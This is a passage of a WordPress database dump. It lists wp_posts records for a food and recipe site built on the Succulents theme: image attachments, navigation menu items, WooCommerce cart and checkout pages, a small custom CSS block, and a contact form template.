13:52:38','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/pricing-img-9.png',0,'attachment','image/png',0),(4248,1,'2018-02-06 15:15:06','2018-02-06 15:15:06','','h8-background-img-1','','inherit','open','closed','','h8-background-img-1-2-2','','','2018-02-06 15:15:06','2018-02-06 15:15:06','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h8-background-img-1.jpg',0,'attachment','image/jpeg',0),(4249,1,'2018-02-22 13:59:08','2018-02-22 13:59:08','','h3-slide3-graphic-4','','inherit','open','closed','','h3-slide3-graphic-4-2','','','2018-02-22 13:59:08','2018-02-22 13:59:08','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide3-graphic-4.png',0,'attachment','image/png',0),(4250,1,'2018-01-25 13:03:42','2018-01-25 13:03:42','','h8-background-img-1','','inherit','open','closed','','h8-background-img-1-3','','','2018-01-25 13:03:42','2018-01-25 13:03:42','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h8-background-img-1.jpg',0,'attachment','image/jpeg',0),(4251,1,'2018-01-29 10:59:17','2018-01-29 10:59:17','','product8-gallery2','','inherit','open','closed','','product8-gallery2-2','','','2018-01-29 10:59:17','2018-01-29 10:59:17','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product8-gallery2.jpg',0,'attachment','image/jpeg',0),(4252,1,'2018-01-29 10:59:19','2018-01-29 10:59:19','','product8-gallery3','','inherit','open','closed','','product8-gallery3-2','','','2018-01-29 10:59:19','2018-01-29 10:59:19','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/product8-gallery3-1.jpg',0,'attachment','image/jpeg',0),(4253,1,'2018-01-29 11:07:41','2018-01-29 11:07:41','','h9-img-6','','inherit','open','closed','','h9-img-6-2','','','2018-01-29 11:07:41','2018-01-29 11:07:41','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h9-img-6-1.jpg',0,'attachment','image/jpeg',0),(4254,1,'2018-01-29 11:07:43','2018-01-29 11:07:43','','h9-img-8','','inherit','open','closed','','h9-img-8-2','','','2018-01-29 11:07:43','2018-01-29 11:07:43','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h9-img-8-1.jpg',0,'attachment','image/jpeg',0),(4255,1,'2018-01-29 12:02:33','2018-01-29 12:02:33','','h9-img-3','','inherit','open','closed','','h9-img-3-2','','','2018-01-29 12:02:33','2018-01-29 12:02:33','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h9-img-3-1.jpg',0,'attachment','image/jpeg',0),(4256,1,'2018-02-23 14:01:17','2018-02-23 14:01:17','','h9-img-17','','inherit','open','closed','','h9-img-17-2','','','2018-02-23 14:01:17','2018-02-23 14:01:17','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h9-img-17-1.jpg',0,'attachment','image/jpeg',0),(4257,1,'2018-02-23 15:24:29','2018-02-23 15:24:29','','landing-slide1-graphic1','','inherit','open','closed','','landing-slide1-graphic1-2','','','2018-02-23 15:24:29','2018-02-23 15:24:29','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide1-graphic1.png',0,'attachment','image/png',0),(4258,1,'2018-03-02 15:05:30','2018-03-02 15:05:30','','home-10','','inherit','open','closed','','home-10-2-2','','','2018-03-02 15:05:30','2018-03-02 15:05:30','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/home-10-1.png',0,'attachment','image/png',0),(4259,1,'2018-02-23 15:24:34','2018-02-23 15:24:34','','landing-slide1-graphic3','','inherit','open','closed','','landing-slide1-graphic3-2','','','2018-02-23 15:24:34','2018-02-23 15:24:34','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/landing-slide1-graphic3-1.png',0,'attachment','image/png',0),(4260,1,'2018-03-05 10:29:27','2018-03-05 10:29:27','','recipe-img-4','','inherit','open','closed','','recipe-img-4-2','','','2018-03-05 10:29:27','2018-03-05 10:29:27','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/recipe-img-4-1.jpg',0,'attachment','image/jpeg',0),(4261,1,'2020-04-07 13:33:23','2020-04-07 13:33:23','','orange-banana-ready-1300-x-1945','','inherit','open','closed','','orange-banana-ready-1300-x-1945','','','2020-04-07 13:33:23','2020-04-07 13:33:23','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/orange-banana-ready-1300-x-1945.jpg',0,'attachment','image/jpeg',0),(4262,1,'2018-03-05 12:56:29','2018-03-05 12:56:29','','blog-recipe-5','','inherit','open','closed','','blog-recipe-5-2','','','2018-03-05 12:56:29','2018-03-05 12:56:29','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-recipe-5-1.jpg',0,'attachment','image/jpeg',0),(4263,1,'2018-03-05 12:56:31','2018-03-05 12:56:31','','blog-recipe-6','','inherit','open','closed','','blog-recipe-6-2','','','2018-03-05 12:56:31','2018-03-05 12:56:31','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/blog-recipe-6-1.jpg',0,'attachment','image/jpeg',0),(4264,1,'2018-03-05 13:00:50','2018-03-05 13:00:50','','recipe-img-2','','inherit','open','closed','','recipe-img-2-2-2','','','2018-03-05 13:00:50','2018-03-05 13:00:50','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/recipe-img-2-1.jpg',0,'attachment','image/jpeg',0),(4265,1,'2018-03-05 13:29:44','2018-03-05 13:29:44','','recipe-img-1','','inherit','open','closed','','recipe-img-1-2','','','2018-03-05 13:29:44','2018-03-05 13:29:44','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/recipe-img-1-1.jpg',0,'attachment','image/jpeg',0),(4266,1,'2018-03-09 13:16:21','2018-03-09 13:16:21','','landing-home9-img-1','','inherit','open','closed','','landing-home9-img-1','','','2018-03-09 13:16:21','2018-03-09 13:16:21','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-home9-img-1.jpg',0,'attachment','image/jpeg',0),(4267,1,'2018-03-09 13:17:16','2018-03-09 13:17:16','','landing-coming-soon-2','','inherit','open','closed','','landing-coming-soon-2','','','2018-03-09 13:17:16','2018-03-09 13:17:16','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-coming-soon-2.jpg',0,'attachment','image/jpeg',0),(4268,1,'2018-03-09 13:33:14','2018-03-09 13:33:14','','landing-cinnamon-slider-1','','inherit','open','closed','','landing-cinnamon-slider-1','','','2018-03-09 13:33:14','2018-03-09 13:33:14','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-cinnamon-slider-1.png',0,'attachment','image/png',0),(4269,1,'2018-03-09 13:39:35','2018-03-09 13:39:35','','landing-portfolio-section-img-1','','inherit','open','closed','','landing-portfolio-section-img-1','','','2018-03-09 13:39:35','2018-03-09 13:39:35','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-portfolio-section-img-1.png',0,'attachment','image/png',0),(4270,1,'2018-03-09 14:30:57','2018-03-09 14:30:57','','landing-cinnamon-slider-2','','inherit','open','closed','','landing-cinnamon-slider-2','','','2018-03-09 14:30:57','2018-03-09 14:30:57','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/landing-cinnamon-slider-2.png',0,'attachment','image/png',0),(4275,1,'2018-03-13 11:08:49','2018-03-13 11:08:49','','h8-img-10','','inherit','open','closed','','h8-img-10','','','2018-03-13 11:08:49','2018-03-13 11:08:49','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/h8-img-10.jpg',0,'attachment','image/jpeg',0),(4277,1,'2018-03-13 11:10:49','2018-03-13 11:10:49','','h9-img-11','','inherit','open','closed','','h9-img-11','','','2018-03-13 11:10:49','2018-03-13 11:10:49','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/h9-img-11.jpg',0,'attachment','image/jpeg',0),(4278,1,'2018-03-13 11:11:26','2018-03-13 11:11:26','','h9-img-12','','inherit','open','closed','','h9-img-12','','','2018-03-13 11:11:26','2018-03-13 11:11:26','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/h9-img-12.jpg',0,'attachment','image/jpeg',0),(4280,1,'2018-03-13 11:12:48','2018-03-13 11:12:48','','h9-img-13','','inherit','open','closed','','h9-img-13','','','2018-03-13 11:12:48','2018-03-13 11:12:48','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/h9-img-13.jpg',0,'attachment','image/jpeg',0),(4282,1,'2018-03-13 11:17:11','2018-03-13 11:17:11','','h9-img-14','','inherit','open','closed','','h9-img-14','','','2018-03-13 11:17:11','2018-03-13 11:17:11','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/h9-img-14.jpg',0,'attachment','image/jpeg',0),(4283,1,'2018-03-13 11:18:12','2018-03-13 11:18:12','','h9-img-15','','inherit','open','closed','','h9-img-15','','','2018-03-13 11:18:12','2018-03-13 11:18:12','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/h9-img-15.jpg',0,'attachment','image/jpeg',0),(4284,1,'2018-03-13 11:18:16','2018-03-13 11:18:16','','h9-img-16','','inherit','open','closed','','h9-img-16','','','2018-03-13 11:18:16','2018-03-13 11:18:16','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/h9-img-16.jpg',0,'attachment','image/jpeg',0),(4287,1,'2018-03-13 12:44:24','2018-03-13 12:44:24','.error404 .qodef-page-not-found .qodef-404-subtitle {\n margin-top: 0;\n}\n\n@media only screen and (max-width: 1280px) and (min-width: 1025px) {\n .qodef-header-standard .qodef-menu-area.qodef-menu-center .qodef-logo-wrapper a {\n height: 40px !important;\n max-height: 80px;\n }\n}','succulents','','publish','closed','closed','','succulents','','','2018-03-13 12:44:24','2018-03-13 12:44:24','',0,'http://succulents.select-themes.com/succulents/',0,'custom_css','',0),(4333,1,'2018-03-14 14:32:55','2018-03-14 14:32:55','','h9-portfolio-1','','inherit','open','closed','','h9-portfolio-1','','','2018-03-14 14:32:55','2018-03-14 14:32:55','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h9-portfolio-1.jpg',0,'attachment','image/jpeg',0),(4335,1,'2018-03-14 14:42:47','2018-03-14 14:42:47','','h9-portfolio-2','','inherit','open','closed','','h9-portfolio-2','','','2018-03-14 14:42:47','2018-03-14 14:42:47','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/h9-portfolio-2.jpg',0,'attachment','image/jpeg',0),(4340,1,'2018-03-14 15:27:13','2018-03-14 15:27:13','','breadcrumb-slika3','','inherit','open','closed','','breadcrumb-slika3','','','2018-03-14 15:27:13','2018-03-14 15:27:13','',0,'http://tummyrevolution.com/wp-content/uploads/2018/03/breadcrumb-slika3.jpg',0,'attachment','image/jpeg',0),(4341,1,'2018-02-14 11:37:19','2018-02-14 11:37:19','','slika1','','inherit','open','closed','','slika1-2','','','2018-02-14 11:37:19','2018-02-14 11:37:19','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika1-1.jpg',0,'attachment','image/jpeg',0),(4342,1,'2018-02-14 11:37:43','2018-02-14 11:37:43','','slika2','','inherit','open','closed','','slika2-2','','','2018-02-14 11:37:43','2018-02-14 11:37:43','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika2-1.jpg',0,'attachment','image/jpeg',0),(4343,1,'2018-02-14 11:38:13','2018-02-14 11:38:13','','slika3','','inherit','open','closed','','slika3-2','','','2018-02-14 11:38:13','2018-02-14 11:38:13','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika3-1.jpg',0,'attachment','image/jpeg',0),(4344,1,'2018-02-14 12:24:21','2018-02-14 12:24:21','','slika4','','inherit','open','closed','','slika4-2','','','2018-02-14 12:24:21','2018-02-14 12:24:21','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika4.jpg',0,'attachment','image/jpeg',0),(4345,1,'2020-04-12 11:58:57','2020-04-12 11:58:57','','Logo-footer-smaller-350-x-1-2','','inherit','open','closed','','logo-footer-smaller-350-x-1-2','','','2020-04-12 11:59:01','2020-04-12 11:59:01','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-footer-smaller-350-x-1-2.png',0,'attachment','image/png',0),(4346,1,'2018-02-19 08:48:56','2018-02-19 08:48:56','','breadcrumb','','inherit','open','closed','','breadcrumb-2','','','2018-02-19 08:48:56','2018-02-19 08:48:56','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/breadcrumb-1.jpg',0,'attachment','image/jpeg',0),(4347,1,'2018-02-19 14:50:28','2018-02-19 14:50:28','','h8-img-10','','inherit','open','closed','','h8-img-10-2-2','','','2018-02-19 14:50:28','2018-02-19 14:50:28','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h8-img-10-1.png',0,'attachment','image/png',0),(4348,1,'2018-02-19 15:34:54','2018-02-19 15:34:54','','h5-tabs-img-1','','inherit','open','closed','','h5-tabs-img-1-3','','','2018-02-19 15:34:54','2018-02-19 15:34:54','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h5-tabs-img-1-1.png',0,'attachment','image/png',0),(4349,1,'2018-02-19 16:17:15','2018-02-19 16:17:15','','h10-slide3-graphic2','','inherit','open','closed','','h10-slide3-graphic2-2','','','2018-02-19 16:17:15','2018-02-19 16:17:15','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h10-slide3-graphic2-1.jpg',0,'attachment','image/jpeg',0),(4350,1,'2018-02-20 10:58:33','2018-02-20 10:58:33','','about-us-img-1','','inherit','open','closed','','about-us-img-1-2-2','','','2018-02-20 10:58:33','2018-02-20 10:58:33','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/about-us-img-1-1.jpg',0,'attachment','image/jpeg',0),(4351,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','home','','publish','closed','closed','','home','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/home/',1,'nav_menu_item','',0),(4352,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','pages','','publish','closed','closed','','pages','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/pages/',13,'nav_menu_item','',0),(4353,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','portfolio','','publish','closed','closed','','portfolio','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/portfolio/',25,'nav_menu_item','',0),(4354,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','blog','','publish','closed','closed','','blog','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/blog/',50,'nav_menu_item','',0),(4355,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','shop','','publish','closed','closed','','shop','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/shop/',61,'nav_menu_item','',0),(4356,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','elements','','publish','closed','closed','','elements','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/elements/',74,'nav_menu_item','',0),(4357,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','HOME','','publish','closed','closed','','home-2','','','2020-04-20 02:02:38','2020-04-20 02:02:38','',0,'http://tummyrevolution.com/2020/03/30/home-2/',1,'nav_menu_item','',0),(4359,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','blog','','publish','closed','closed','','blog-2','','','2020-04-12 23:25:04','2020-04-12 23:25:04','',0,'http://tummyrevolution.com/2020/03/30/blog-2/',1,'nav_menu_item','',0),(4360,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','shop','','publish','closed','closed','','shop-2','','','2020-03-30 21:53:23','2020-03-30 21:53:23','',0,'http://tummyrevolution.com/2020/03/30/shop-2/',12,'nav_menu_item','',0),(4362,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','Error Page','','publish','closed','closed','','error-page','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/error-page/',20,'nav_menu_item','',0),(4363,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','home','','publish','closed','closed','','home-3','','','2020-03-30 21:53:23','2020-03-30 21:53:23','',0,'http://tummyrevolution.com/2020/03/30/home-3/',1,'nav_menu_item','',0),(4364,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','pages','','publish','closed','closed','','pages-3','','','2020-03-30 21:53:23','2020-03-30 21:53:23','',0,'http://tummyrevolution.com/2020/03/30/pages-3/',6,'nav_menu_item','',0),(4365,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','blog','','publish','closed','closed','','blog-3','','','2020-03-30 21:53:23','2020-03-30 21:53:23','',0,'http://tummyrevolution.com/2020/03/30/blog-3/',18,'nav_menu_item','',0),(4366,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','shop','','publish','closed','closed','','shop-3','','','2020-03-30 21:53:23','2020-03-30 21:53:23','',0,'http://tummyrevolution.com/2020/03/30/shop-3/',22,'nav_menu_item','',0),(4367,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','Single Post','','publish','closed','closed','','single-post','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/single-post/',54,'nav_menu_item','',0),(4368,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','Shop Layouts','','publish','closed','closed','','shop-layouts','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/shop-layouts/',64,'nav_menu_item','',0),(4369,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','Shop Pages','','publish','closed','closed','','shop-pages','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/shop-pages/',70,'nav_menu_item','',0),(4370,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','Portfolio Types','','publish','closed','closed','','portfolio-types','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/portfolio-types/',26,'nav_menu_item','',0),(4371,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','Layouts','','publish','closed','closed','','layouts','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/layouts/',32,'nav_menu_item','',0),(4372,1,'2020-03-30 21:53:23','2020-03-30 21:53:23','','Portfolio Single','','publish','closed','closed','','portfolio-single','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/portfolio-single/',40,'nav_menu_item','',0),(4376,1,'2020-03-30 21:53:24','2020-03-30 21:53:24','','Home','','publish','closed','closed','','home-4','','','2020-03-30 21:53:24','2020-03-30 21:53:24','',0,'http://tummyrevolution.com/2020/03/30/home-4/',1,'nav_menu_item','',0),(4377,1,'2020-03-30 21:53:24','2020-03-30 21:53:24','','Pages','','publish','closed','closed','','pages-4','','','2020-03-30 21:53:24','2020-03-30 21:53:24','',0,'http://tummyrevolution.com/2020/03/30/pages-4/',5,'nav_menu_item','',0),(4378,1,'2020-03-30 21:53:24','2020-03-30 21:53:24','','Blog','','publish','closed','closed','','blog-4','','','2020-03-30 21:53:24','2020-03-30 21:53:24','',0,'http://tummyrevolution.com/2020/03/30/blog-4/',17,'nav_menu_item','',0),(4379,1,'2020-03-30 21:53:24','2020-03-30 21:53:24','','Shop','','publish','closed','closed','','shop-4','','','2020-03-30 21:53:24','2020-03-30 21:53:24','',0,'http://tummyrevolution.com/2020/03/30/shop-4/',21,'nav_menu_item','',0),(4380,1,'2020-03-30 21:53:24','2020-03-30 21:53:24','','Portfolio','','publish','closed','closed','','portfolio-2','','','2020-03-30 21:53:24','2020-03-30 21:53:24','',0,'http://tummyrevolution.com/2020/03/30/portfolio-2/',13,'nav_menu_item','',0),(4381,1,'2020-03-30 21:53:24','2020-03-30 21:53:24','','Classic','','publish','closed','closed','','classic','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/classic/',75,'nav_menu_item','',0),(4382,1,'2020-03-30 21:53:24','2020-03-30 21:53:24','','Interactive','','publish','closed','closed','','interactive','','','2020-04-04 23:07:31','2020-04-04 23:07:31','',0,'http://tummyrevolution.com/2020/03/30/interactive/',83,'nav_menu_item','',0),(4383,1,'2020-03-30 21:53:24','2020-03-30 21:53:24','','Infographic','','publish','closed','closed','','infographic','','','2020-04-04 23:07:31','2020-04-04 23:07:31','',0,'http://tummyrevolution.com/2020/03/30/infographic/',89,'nav_menu_item','',0),(4384,1,'2020-03-30 21:53:24','2020-03-30 21:53:24','','Typography','','publish','closed','closed','','typography','','','2020-04-04 23:07:31','2020-04-04 23:07:31','',0,'http://tummyrevolution.com/2020/03/30/typography/',97,'nav_menu_item','',0),(4385,1,'2020-03-30 21:53:24','2020-03-30 21:53:24','','portfolio','','publish','closed','closed','','portfolio-3','','','2020-03-30 21:53:24','2020-03-30 21:53:24','',0,'http://tummyrevolution.com/2020/03/30/portfolio-3/',14,'nav_menu_item','',0),(4386,1,'2020-03-30 21:53:24','2020-03-30 21:53:24','','recipe','','publish','closed','closed','','recipe','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/recipe/',21,'nav_menu_item','',0),(4389,1,'2020-03-30 21:53:24','2020-03-30 21:53:24','','Classic','','publish','closed','closed','','classic-2','','','2020-04-12 23:12:29','2020-04-12 23:12:29','',0,'http://tummyrevolution.com/2020/03/30/classic-2/',25,'nav_menu_item','',0),(4390,1,'2020-03-30 21:53:24','2020-03-30 21:53:24','','Infographic','','publish','closed','closed','','infographic-2','','','2020-04-12 23:12:29','2020-04-12 23:12:29','',0,'http://tummyrevolution.com/2020/03/30/infographic-2/',26,'nav_menu_item','',0),(4391,1,'2020-03-30 21:53:24','2020-03-30 21:53:24','','Interactive','','publish','closed','closed','','interactive-2','','','2020-04-12 23:12:29','2020-04-12 23:12:29','',0,'http://tummyrevolution.com/2020/03/30/interactive-2/',27,'nav_menu_item','',0),(4392,1,'2020-03-30 21:53:24','2020-03-30 21:53:24','','Typography','','publish','closed','closed','','typography-2','','','2020-04-12 23:12:29','2020-04-12 23:12:29','',0,'http://tummyrevolution.com/2020/03/30/typography-2/',28,'nav_menu_item','',0),(4393,1,'2020-03-30 21:53:24','2020-03-30 21:53:24','','Recipe','','publish','closed','closed','','recipe-3','','','2020-03-30 21:53:24','2020-03-30 21:53:24','',0,'http://tummyrevolution.com/2020/03/30/recipe-3/',9,'nav_menu_item','',0),(4394,1,'2020-03-30 21:53:24','2020-03-30 21:53:24','','recipe','','publish','closed','closed','','recipe-4','','','2020-03-30 21:53:24','2020-03-30 21:53:24','',0,'http://tummyrevolution.com/2020/03/30/recipe-4/',10,'nav_menu_item','',0),(4396,1,'2017-12-18 13:29:43','2017-12-18 13:29:43','[woocommerce_cart]','Cart','','publish','closed','closed','','cart','','','2017-12-18 13:29:43','2017-12-18 13:29:43','',0,'http://succulents.select-themes.com/cart/',0,'page','',0),(4397,1,'2017-12-18 13:29:43','2017-12-18 13:29:43','[woocommerce_checkout]','Checkout','','publish','closed','closed','','checkout','','','2017-12-18 13:29:43','2017-12-18 13:29:43','',0,'http://succulents.select-themes.com/checkout/',0,'page','',0),(4398,1,'2017-12-18 13:23:26','2017-12-18 13:23:26','\n1\nSucculents \\\"[your-subject]\\\"\n[your-name] \nsucculents@select-themes.com\nFrom: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Succulents (http://succulents.select-themes.com)\nReply-To: [your-email]\n\n\n\n\nSucculents \\\"[your-subject]\\\"\nSucculents \n[your-email]\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Succulents (http://succulents.select-themes.com)\nReply-To: succulents@select-themes.com\n\n\n\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.\nThe date format is incorrect.\nThe date is before the earliest one allowed.\nThe date is after the latest one allowed.\nThere was an unknown error uploading the file.\nYou are not allowed to upload files of this type.\nThe file is too big.\nThere was an error uploading the file.\nThe number format is invalid.\nThe number is smaller than the minimum allowed.\nThe number is larger than the maximum allowed.\nThe answer to the quiz is incorrect.\nYour entered code is incorrect.\nThe e-mail address entered is invalid.\nThe URL is invalid.\nThe telephone number is invalid.','Contact form 1','','publish','closed','closed','','contact-form-1-2','','','2017-12-18 13:23:26','2017-12-18 13:23:26','',0,'http://succulents.select-themes.com/?post_type=wpcf7_contact_form&p=4',0,'wpcf7_contact_form','',0),(4399,1,'2020-03-30 21:53:27','2020-03-30 21:53:27',' ','','','publish','closed','closed','','4399','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/4399/',2,'nav_menu_item','',0),(4401,1,'2020-03-30 21:53:27','2020-03-30 21:53:27',' ','','','publish','closed','closed','','4401','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/4401/',15,'nav_menu_item','',0),(4402,1,'2020-03-30 21:53:27','2020-03-30 21:53:27',' ','','','publish','closed','closed','','4402','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/4402/',17,'nav_menu_item','',0),(4403,1,'2020-03-30 21:53:27','2020-03-30 21:53:27',' ','','','publish','closed','closed','','4403','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/4403/',18,'nav_menu_item','',0),(4404,1,'2020-03-30 21:53:27','2020-03-30 21:53:27',' ','','','publish','closed','closed','','4404','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/4404/',19,'nav_menu_item','',0),(4406,1,'2020-03-30 21:53:27','2020-03-30 21:53:27',' ','','','publish','closed','closed','','4406','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/4406/',11,'nav_menu_item','',0),(4407,1,'2020-03-30 21:53:27','2020-03-30 21:53:27',' ','','','publish','closed','closed','','4407','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/4407/',3,'nav_menu_item','',0),(4408,1,'2020-03-30 21:53:27','2020-03-30 21:53:27',' ','','','publish','closed','closed','','4408','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/4408/',5,'nav_menu_item','',0),(4409,1,'2020-03-30 21:53:28','2020-03-30 21:53:28',' ','','','publish','closed','closed','','4409','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/4409/',6,'nav_menu_item','',0),(4410,1,'2020-03-30 21:53:28','2020-03-30 21:53:28',' ','','','publish','closed','closed','','4410','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/4410/',4,'nav_menu_item','',0),(4411,1,'2020-03-30 21:53:28','2020-03-30 21:53:28',' ','','','publish','closed','closed','','4411','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/4411/',51,'nav_menu_item','',0),(4412,1,'2020-03-30 21:53:28','2020-03-30 21:53:28','','Standard','','publish','closed','closed','','standard','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/standard/',55,'nav_menu_item','',0),(4413,1,'2020-03-30 21:53:28','2020-03-30 21:53:28','','Audio','','publish','closed','closed','','audio','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/audio/',60,'nav_menu_item','',0),(4414,1,'2020-03-30 21:53:28','2020-03-30 21:53:28','','Quote','','publish','closed','closed','','quote','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/quote/',57,'nav_menu_item','',0),(4415,1,'2020-03-30 21:53:28','2020-03-30 21:53:28','','Link','','publish','closed','closed','','link','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/link/',58,'nav_menu_item','',0),(4416,1,'2020-03-30 21:53:28','2020-03-30 21:53:28','','Gallery','','publish','closed','closed','','gallery-2','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/gallery-2/',56,'nav_menu_item','',0),(4417,1,'2020-03-30 21:53:28','2020-03-30 21:53:28','','Video','','publish','closed','closed','','video','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/video/',59,'nav_menu_item','',0),(4418,1,'2020-03-30 21:53:28','2020-03-30 21:53:28',' ','','','publish','closed','closed','','4418','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/4418/',52,'nav_menu_item','',0),(4419,1,'2020-03-30 21:53:28','2020-03-30 21:53:28',' ','','','publish','closed','closed','','4419','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/4419/',53,'nav_menu_item','',0),(4420,1,'2020-03-30 21:53:28','2020-03-30 21:53:28',' ','','','publish','closed','closed','','4420','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/4420/',9,'nav_menu_item','',0),(4421,1,'2020-03-30 21:53:28','2020-03-30 21:53:28',' ','','','publish','closed','closed','','4421','','','2020-04-04 23:07:30','2020-04-04 23:07:30','',0,'http://tummyrevolution.com/2020/03/30/4421/',10,'nav_menu_item','',0),(4434,1,'2020-03-30 21:53:28','2020-03-30 21:53:28',' ','','','publish','closed','closed','','4434','','','2020-03-30 